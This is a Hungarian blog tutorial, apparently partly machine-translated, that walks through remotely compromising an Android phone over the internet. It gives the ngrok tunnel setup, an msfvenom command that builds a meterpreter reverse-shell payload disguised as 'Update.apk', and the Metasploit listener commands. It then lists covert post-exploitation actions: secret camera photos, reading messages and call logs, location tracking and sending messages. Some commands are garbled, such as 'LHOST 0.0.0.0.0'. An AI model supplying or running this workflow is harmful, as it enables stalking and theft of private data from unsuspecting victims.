Hacking Android Device [Remotely]

Hacking over WAN

Itt megnézheti a videó-tutorialomat a youtube-on:
https://youtu.be/Bbp-AcejtHI

A WAN-ban általában először is szükség van egy statikus IP/Hostname-ra, másodszor pedig Port Forwarding-ra, hogy lehetővé tegye a forgalom átvitelét, és mindannyian tudjuk, hogy mindkettő olyan nehéz valós időben, mivel korlátozott hozzáférésünk van a portokhoz a hálózatban.

Azt fogjuk tehát csinálni ebben a forgatókönyvben, hogy létrehozunk egy biztonságos alagutat az Ngrok segítségével.

A Ngrok egy olyan alagutas fordított proxy rendszer, amely alagutakat hoz létre a nyilvános végpontról, azaz az internetről egy helyben futó hálózati szolgáltatáshoz. Ez segíthet nekünk abban, hogy egy nyilvános HTTP/HTTPS URL-t hozzunk létre egy, a gépünkön helyben futó weboldalhoz. Az Ngrok használata során nem kell semmilyen porttovábbítást végeznünk, és a hálózati szolgáltatásunk végül a TCP-alagút segítségével fog megjelenni az interneten.

Kövesse az alábbi lépéseket a folytatáshoz:

1. lépés: Regisztráljon az Ngrok fiókhoz a letöltéshez.

Először is regisztrálnia kell az Ngrok fiókhoz, majd ezután a letöltési ablakhoz fog vezetni.

A Ngrok regisztrációs ablaka

A regisztráció után letöltheti az Ngrok-ot a Linux rendszerére.

Egyszerűen kicsomagolja a letöltött fájlt.

Step2: Connect your account

A parancs futtatása hozzáadja az auth tokenjét az alapértelmezett ngrok.yml konfigurációs fájlhoz. Ez több funkcióhoz és hosszabb munkamenetidőhöz biztosít hozzáférést. (Be kell másolnod és be kell illesztened ide a saját tokenedet, amelyet a bejelentkezés után az ngrok kezdőképernyőjén adnak meg)

./ngrok authtoken <a tokened>

Most készen állsz az eszköz használatára. Nyisd meg a terminálodat menj abba a könyvtárba, ahonnan az Ngrock eszközt kinyomtattad és írd be:

./ngrok tcp

válaszd ki azt a portszámot, amire kapcsolatot akarsz kötni(itt az 5555-öt választottam portszámnak). És az enter megnyomása után valami ilyesmi képernyő fog megjelenni.

A továbbítás itt adja meg a TCP alagutat, amit az ngrok létrehozott. A kapcsolat a localhosthoz kötődött az 5555-ös porton. Most egy rosszindulatú hasznos terhet kell generálnunk az msfvenom segítségével.

Step3: A hasznos terhelés generálása

Ezt úgy teheti meg, hogy megnyit egy új Terminált a Kali Linux gépén, majd beírja a következő kódot.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

De ne feledjük, ezúttal kicsit másképp kell eljárnunk, mint a LAN-ban végrehajtott támadásnál. Itt az IP-cím helyett az ngrokban megadott továbbítási linket kell megadnunk (2.tcp.ngrok.io). A port száma pedig 15787 lesz. Ne feledje, hogy fontos, hogy ugyanazt a portszámot adja meg, amit az Ngrok a porttovábbításban megad.

Megjegyzés: Ha az IP-cím megadása 2.tcp.ngrok.io-ként nem működik, akkor helyettesítheti egy IP-címmel, amit a “ping” parancs segítségével kaphat meg.
Nyisson egy terminált, és írja be a ping 2.tcp.ngrok.io-t, majd nyomja meg az Entert. Egy IP-címet fog kapni, amelyet az LHOST helyére kell beírnia.

Itt az “Update.apk” fájlt használtam a payloadunk fájlneveként. Ezt a fájlt kell telepíteni a célpontunk Android készülékére. De mielőtt telepítenénk ezt a fájlt, be kell állítanunk a hallgatót. Ehhez kövesse a 4. lépést.

Step4: Set-Up a Listener

Nyissa meg a terminált, és töltse be a Metasploit konzolt a következő beírással: msfconsole
A betöltés után (néhány másodperc múlva) töltse be a multi-handler exploitot a következő beírással:

use exploit/multi/handler

Most állítsd be a fordított hasznos terhelést a következő beírással:

set payload android/meterpreter/reverse_tcp

Az LHOST-ot állítsd 0-ra.0.0.0 és LPORT 5555
(A portszámnak meg kell egyeznie azzal a portszámmal, amelyet az ngrokban a kapcsolat megkötéséhez használtunk)

set LHOST 0.0.0.0.0
set LPORT 5555

Végül írjuk be az exploit-ot a listener elindításához.

A lehallgatási mód be van kapcsolva

5. lépés: Telepítse a Malicious Update.apk fájlt a célpont eszközére

Az áldozat telepítse az alkalmazást, és amint települ, futtassa azt. Amikor az áldozat megérinti az alkalmazás megnyitása opciót, hozzáférést kap az androidos készülék összes funkciójához. Az alkalmazás megnyitása után azonban semmi sem fog megjelenni a készülék képernyőjén.

Post-Exploitation

Type help to see the various options that you can use to execut the different tasks on the victim’s device.
Lehet hozzáférni a kamerához és fényképet készíteni anélkül, hogy értesítené őket. Ellenőrizheti az üzeneteiket, hívásnaplóikat, és elmentheti azokat a rendszerében is.
Ezeken kívül megtekintheti és megnyithatja a készülékükre telepített bármelyik alkalmazást. Még a felhasználó aktuális tartózkodási helyének koordinátáit is megtudhatja.
A készülékükön keresztül üzeneteket is küldhet bármelyik kapcsolattartó számra.

Vélemény, hozzászólás?

Az e-mail-címet nem tesszük közzé.